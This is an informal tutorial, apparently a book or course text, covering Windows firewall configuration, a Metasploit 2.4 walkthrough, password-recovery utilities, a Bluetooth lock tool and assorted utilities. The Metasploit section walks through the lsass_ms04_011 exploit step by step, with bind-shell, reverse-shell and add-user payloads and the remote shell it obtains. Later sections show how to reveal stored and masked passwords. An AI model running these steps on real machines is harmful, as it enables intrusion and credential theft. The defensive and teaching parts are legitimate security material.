We are not allowed access to any sites at all, but e-mail access is allowed. We then come back to zone labs and now choose the button Edit destination, modify and then add location host/site. For description we write Search and then for host name www.google.co.in. When we click on OK, we are not allowed access to google.co.in. If we instead type in another url www.microsoft.com, we are allowed access. Thus we can now specify only those sites to be blocked. The default was block all, now we have to be specific.
We then deleted the rule we just created and if you remember we have a web server running on this machine and its ip address is http://220.224.17.248. We write the following url in ie http://220.224.17.248/a.html and see a page served by our server. We now want to block http server access. We click on add, on the next dialog box we write a label http server for the name.
Choose block in action, click on Modify for protocol, Add protocol, Add protocol, keep tcp as the protocol, Write http for description and now change the Source port to HTTP and keep the destination port the same. The reverse of the last time. We now get an error in ie as the firewall is now blocking our http server. Its better to close the browser ie as we may receive the page from the cache. This is how we can prevent a rogue server from running on our machine.
Our next firewall is downloaded from the site http://www.looknstop.com/En/download.htm and is called finalapps.exe and like za boots our machine for us. We uninstalled zone labs first before installing look n stop as we cannot have two programs doing the same. We restart our computer and now any program that connects to the net, we are now in a position to block it as we are asked in a dialog box to authorize or block No different from zone labs.
When we click on the look and stop icon on the tray we are told of the status of our PC whether connected to the net, and then its ip address, our PC name and how many packets send and received as well as packets filtered. For some reason, Word tries to connect to the net.
When we click on the tabbed dialog box Application filtering we see the applications that we have blocked or given permission to connect. If we click on the tick of IE, it becomes a dot which means that the next time ie connects to the net it will ask us. We check this by clicking ion refresh in ie and get the same dialog box asking us to authorize.
The second column if green means permissions given, click it becomes red, permissions denied. We can also click on the remove button at the bottom to remove the program from the list and repeat the whole process of asking. The first tabbed window tells us the currently running programs.
The third tab internet filtering allows us to set rules so that the firewall can block these packets. We then click on the Add button to add a new rule. We write the name of the of the rule as Vijay. The direction is both inbound and outbound as we want to stop all internet traffic coming and going. For Tcp/UDP port under source we keep the All option the list box. We move to the destination and change the Tcp/Udp port to equals and we then chose http port 80 in next list box which gives us a list of port numbers and the services that run on them.
We could have also specified a range of port numbers in the first list box. We click on Apply and now all http access is blocked.
We double click on Vijay and then choose Destination IP address. Here we choose in range A-B. We know that google India is in the range 64.233.187 and the last may vary. We thus write 64.233.187.0 in the first list box and 64.233.187.255 in the last. Now google is blocked but not Microsoft.
If we click on the second column, the red become a dot, the rule is disabled. Clicking on the check box of rule set also disables the rule. The next tab log tells us what is going on like any log does, which is tells us which rules were applied to which sites. This is how we can figure out who has been attacking our site.
Thus this firewall is like any other firewall, at the end of the day they are all the same, they do the same things but they do it differently. Hence we will rush through the next series of firewalls.
The next firewall comes from the site http://www.armor2net.com/free_download/download.htm and is called armor2nt.exe
Like all the other firewalls this one is also a device driver that requires a reboot of our portable. It also allows us to configure the options we want and it is a good idea to keep the defaults as they are. It also asks us like the other firewalls whether to allow or deny programs access to the net. It also remembers which programs have been given access and thus will not nag us each time. Each time a program we have blocked tries to connect to the net it makes a annoying beeping sound and show us a window.
When we double click on the tray we see amour to net give us three tabs Net State, Program Filter and Logs. The program filter tab shows us which programs have permissions to connect to the net. Also we see the tab logs that tell us what internet activity has been blocked
At the bottom of the screen there is the option I want, block some site. We click on Add and write the name of the site www.google.co.in , click on ok and that site gets blocked. When we try and connect to google now we see a pop up message that says that access was blocked.
The last firewall is from the site http://www.deerfield.com/download/visnetic-firewall/index.htm and the file name is vfsetup.exe. When we double click on the application in the tray, it shows us screen where we click on ports in the first tab.
This is a very useful display that gives us every application running on our machine that has bound to which tcp or UDP port and the full path name of the program. A must for every user as it tells us which programs are bound to which port. This is how we know that the program javaw binds to 6 ports on our computer.
We then click on tab connections and then start IE to connect to google. We see one connection on that tells us the destination IP address and the source and destination ports as well as the time. This display is dynamic as it gives a running commentary of what happened like Syn send etc.
The log display is the most useful. It shows us lots of entries and if we double click on a entry, we can see the actual bytes that were send or blocked as the case may be. Not only does it give us the raw bytes in the second column but an english explanation in the first. Clicking on bytes in the second column gives us a highlighted link in the first. This log is intelligent as it understands lots of internet protocols.
If we click on the tab Ban list in the first column and then right mouse button new, we can specify IP addresses to block. Here give the range 64.233.187.0 to 64.233.187.255 i.e. google which gets blocked. We could also ban from the log menu.
Network adapters shows us two bluetooth adapters and one dial up. When we choose our dial up adapter, click on the plus and then click on option rules we can set some rules for internet activity. We click on the TCP tab and then right mouse button new. We choose the protocol this rule applies to TCP.
We click on the tab filtering and then for service we chose E-Mail POP3 for fetching mail. The port number becomes 110 by default. We chose the last tab actions and then block. This prevents us from receiving e-mail but not sending e-mail. We can also see all the rules set by default. Thus this firewall does whatever all the other firewalls do.
All about hacking but we were afraid to ask
Lets understand the Metasploit framework by first
downloading the file from the site http://www.metasploit.com/tools/framework-2.4.exe.
Installing this program creates lots of sub directories under the directory
program files. This product is used to test whether someone else can take over
our computer. We are running Windows 2000 and what follows is a short tutorial
on how to use this product.
MetaSploit
We click on Start, Programs, Metasploit Framework,
MSf Console. This is a program that runs in a dos box. This is the screen that
we see.
+ -- --=[ msfconsole v2.4 [79 exploits - 75
payloads]
msf >
At this prompt we write show exploits to see a list
of exploits that come bundled with the product. There are too many exploits to
be displayed. An exploit is a program that takes advantage of a vulnerability
in our operating system or a application program. As the output shows us 79 exploits,
this means that the program Metasploit exploit knows of 79 different ways
someone can take over our machine. An exploit is however specific to a os or
product version. The command show
payloads will display a list of
payloads bundled with the product. A payload is our program that we want to run on the target system after we have
taken control of it
The exploit lsass_ms04_011 works well with Windows
2000. We will use this exploit by writing use lsass_ms04_011 and the prompt
changes for us. We do not have to write the entire command, write as much as
you want and the tab key finishes the rest.
Msf> use lsass_ms04_011
The prompt now changes to msf lsass_ms04_011 >.
To run a exploit we write the command exploit.
msf lsass_ms04_011 > exploit
[*] This exploit requires a valid payload to be
specified first.
We get an error as we have not specified a payload
to be executed on our target machine. Thus we have to set the PAYLOAD variable
by specifying the set command as
msf lsass_ms04_011 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
The win32_bind is the simplest payload that we can
use. This payload simply opens up a dos box on the remote machine we are
running the exploit for but the input and output is redirected from the other
machine to ours. This means that if we do a dir in the dos box it will happen
on the other machine not ours.
msf lsass_ms04_011(win32_bind) > exploit
Error: Missing required option: RHOST
We again write exploit and we get another error.
Thus it is better to use the show options to find out what options the exploit
and payload require.
msf lsass_ms04_011(win32_bind) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ -------
------------------
required RHOST The target address
required RPORT 139 The target port
Payload: Name Default Description
-------- -------- -------
-----------------------------------------
required EXITFUNC thread Exit
technique: "process", "thread", "seh
required LPORT 4444 Listening port for bind shell
Target:
Automatic
This outputs tells us that the lsass exploit will
target port 139 and the RHOST variable is the IP address of the target host
that we have to specify. Thus we use the set command once again.
We have a portable that uses a reliance card. We
connect to the net and using ipconfig or the monitor icon we find out that the
ip address of that machine is 192.168.1.128
Now when we exploit the target we are in a dos shell
as.
msf lsass_ms04_011(win32_bind) > set RHOST
192.168.1.128
RHOST -> 192.168.1.128
In your specific case you will have to specify an ip
address of the target machine. This could be a real ip address on an IP address
of a computer on your network.
msf lsass_ms04_011(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target (MACH2)
[*] Sending 8 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 70.0.0.10:1134 <->
70.0.0.2:4444
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
This is how we can take over some other machine.
Exit takes us out of the dos box. The win32_reverse shell allows the other side
to make the connection. This requires our IP address and thus we have to use
set LHOST 70.0.0.10 to make the connect. The win32_exec allows us to run a
program on the other machine. The name of the program is specified by the CMD
variable. Finally to create a new user on the other machine we use the
win32_adduser payload. The user and pass variables contain the user name and
password. The setg command shows us all the global variables defined. What we
do is use setg like set. When we write setg PAYLOAD win32_exec, it creates a
global variable PAYLOAD. Using the command save, it save it to a file. This
allows the framework to remember variables each time we load the console. The
unsetg command removes the variable. There is also a web interface to what we
have done. When we run the program MSFWeb it creates a server on 127.0.0.1 port
55555. When we run a browser with the url http://127.0.0.1:55555
we are given a browser interface to the framework.
We now change the payload to Set PAYLOAD win32_adduser And then set the following two variables PASS and USER that contain the user id and password of the new user we would like to create. Set USER vijay1Set PASS vijay1 When we now run the command exploit, we are creating a new user vijay1 with password vijay1.
Passwords with an asterix
We download a program ariskkey.exe from the site http://www.lostpassword.com/asterisk.htm?id=ariskkey_5_5_345. We then run this program from the start menu and then run file keylogger.html that has a input tag of password. We type in vijay in this text box and we see a series of stars. We move to ariskkey and then click on the icon recover. It comes back and tells us all text boxes on our screen and what we had originally typed in them. We then move yahoo.co.in and click on the mail icon and then type in our password. We activate ariskkey and then again click on recover. We see our password in black and white.
At the same site lostpassword we download a program for network connections called nckeyd.exe. When we run this program and click on Recover we see the first two characters of our passwords for all our networking connections. We download cain and abel from the site http://www.oxid.it/downloads/ca_setup.exe. When we run the program we click on tab lsa secrets and move to the heading RasDialParams. Here we see all the passwords of our network connections displayed not just the first two characters. Always check for free programs that do the same thing before buying a paid program.
Outlook passwords
We ran a program oepseetup.exe which we downloaded from the site http://www.thegrideon.com/download/oepsetup.exe. When we ran the program off the start menu we see a blank screen and click on the second icon in the toolbar which displays all the outlook express passwords we have. It shows a message box which tells us that as we have not paid 19$ it will show us any three letters of the password. Had we clicked on yes it would take us to the web site where we could un lock the program.
The dialog shows us the server name, e-mail id and parts of the password and the e-mail protocol used POP 3 in our case. See how simple it is to steal a outlook express password.
Bluetooth for remote locking
We download a file lockitnow.zip from the site http://www.bluetoothshareware.com/files/lockitnow.zip and run the setup program. We are asked to reboot the system which we do. When we reload windows we are asked to specify a password that will unlock our computer whenever it gets locked. We click on the button set password, then button next and finally finished.
We see a blue lock at the bottom of the screen and click on the right mouse button and choose settings. In the first list box we change it to use with phone instead of the default use without phone. We also select the radio button bluetooth enquiry that activates the next button search which we select.
We click on the button that effectively says turn your bluetooth on. Bluetooth inquiry is a more sophisticated method over the bluetooth search where we have to specify a com port. On our machine com3 doubles up as a bluetooth port. The newer phones support bluetooth enquiry, the older ones do not.
We then see our bluetooths device number and name in the dialog box and we click on add so that it comes to the second dialog box. And then click on OK. If we choose several phones then if any one of them is nearby then our phone will not be locked. However if a single phone comes into range the lock is removed. Also this works with any bluetooth device not just phones. The bluetooth connect may be to complicated for one to use.
Now disable bluetooth on the mobile phone and do nothing for about 45 seconds. Lockitnow kicks in and we get a screen saver which locks out our computer.
We can either type in our password or switch bluetooth on the mobile phone and the screen saver disappears. The second tab allows us to change the period of inactivity before the screen gets locked. We set it to 1 minute and the first two progress bars we change it to fast. These are the lock response unlock response time.
The first slide bar allows us to decide how fast our phone will be locked when the bluetooth device moves away. Too fast and our computer may be locked even though our bluetooth is there as there is no guarantee that our device will be found. So be happy with the defaults. The last option advanced is when we are using too many blue tooth devices and we want this program not to slow them down. You can also use this product to lock your computer normally without a phone at a specified schedule.
The third setting is only active if you have earlier unlocked the computer by giving in a password but the phone was not present. Now if we do not press a key for a minute the computer will lock itself. If we move out of range with the phone the computer will lock itself.
The first time we ran the program all went well, the next we re installed it the bluetooth phone was not recognized.
We removed the pairings and then our computer found our phone as a blue tooth device. The screen saver kicks in whenever we have no activity on our machine.
lalsetup250.exe is a program called look and feel and gives us some basic information about a network later
ccset125.exe is a program that cleans up all unwanted entities on your hard disk.
dcsetup.exe is a disk cleaner of unwanted files only
pci_filerecovery.exe lets us recovery deleted files
everesthome200.exe is a program that display all the information about everything on your computer
freeproxy.zip is a working proxy server
vnc9500.zip is the vnc client for the symbian os
whois.exe is a simple program that displays all the information that we normally get when we visit apnic.net and ask for the owner of an IP address. If we write whois www.vsnl.com we get an error as the site name is vsnl.com. Thus writing whois vsnl.com gives us more than a screen full of information.
NetworkInfo_Setup.exe is a cool program. It gives us a GUI tool that lists out all our interfaces.
KeyTweak_install.exe allows us to remap keys on the keyword. Thus the letter a can be mapped to a 1.
Siw.exe tells us tons of detail about our system. There is nothing about our computer that it does not know.
When visdir12.exe is first run it scan all the directories on our computer. It then shows us in two panes list of directories and the space in percentage that each directory takes up. For example clicking on program files shows us that visual studio takes up most of the disk space.
landiscoverysetup1.0.exe first scan your lan and tells you all the computers on your lan. It displays this information in the left pane and when we click on any machine displayed it shows us for details of that machine.
We fired up our trusty ethereal and realized that this product uses ping to check whether the host is up and then the SMB protocol or Server Message Block to figure out details about each machine
nview10.exe does three things, it is a web scanner, port scanner and allows us a graphical interface to a network machines details.
inftraf_setup_135.exe allows us to view traffic as per interfaces. We first write out a IP address in the first text box 70.0.0.10 and then click on the button first contact. We then click on the button First Contact and see a list of interfaces on our machine. The first three are 1,2 and 3 whereas the next start from 16777221. We change the interface number to the card we are interested in capturing and then click on start polling. This gives us a running commentary on what is going on
The program iOpus-SEA-setup.exe downloaded from the site iOpus-SEA-setup.exe installs iOpus-Secure e-mail attachments. We run the program of the start menu and we click on Create secure e-mail attachment button the initial dialog box. At the next dialog box we have to add files that we want to send across as attachments by clicking on Add specific files button. At the dialog box we navigate to the file we want to add and click on open and repeat the same process for each file we want to add. We then click on Continue.
The program will create for us a exe file as an attachment and we specify the name of the exe file which gets saved in the Program files, iopusSEA directory. We call our file vijay1 and by clicking on the check box we change the file to a zip file vijay1.zip. This zip file in turn will contain the exe file. We have to specify a password twice and the larger the password the more the progress bar moves to more secure. We click on Continue and our attachment gets saved. We send this as a e-mail and when we open the zip file we see a exe file.
Running the exe file gives us a dialog box where we are asked to write our password before we can access the attachments . Giving the right password show us all the files in our attachment and clicking on continue extracts the files in the directory we specify.
The program diskview.exe does not have to be installed. We click on the second tab location of file, write the file name in the text box and click on Show. This shows us where on disk is the file stored by stating the virtual and logical cluster numbers and the length of the block. Check with other programs what the cluster number is all about as specifying this number in the third tab which displays a cluster does not give us the contents of the file.
dskinv.exe allows us to investigate our disks but we will find a better program.
Sequoia1_3Install.exe funny program try it out
emcoremoteshutdown.exe is downloaded from the site http://www.emco.is/downloads.html . After we execute the program we are given a dialog box that tells us that we can use this software for 15 days only and we have to click on the evaluate button. We click on the button Enumerate LAN and it gives us a heading Microsoft Windows Network on which we click on the plus. This shows us in our case the name of our workgroup vmukhi. Clicking on the plus shows us the machines sharing this workgroup name. We see two machines and we click on the second and drag and drop it into the second pane. We then click on button perform action that gives us a dialog box. Here we type in a message and click on OK. In seconds the other machine now reboots and displays our message in the dialog box. This dialog box on the remote machine displays the number of seconds left before rebooting.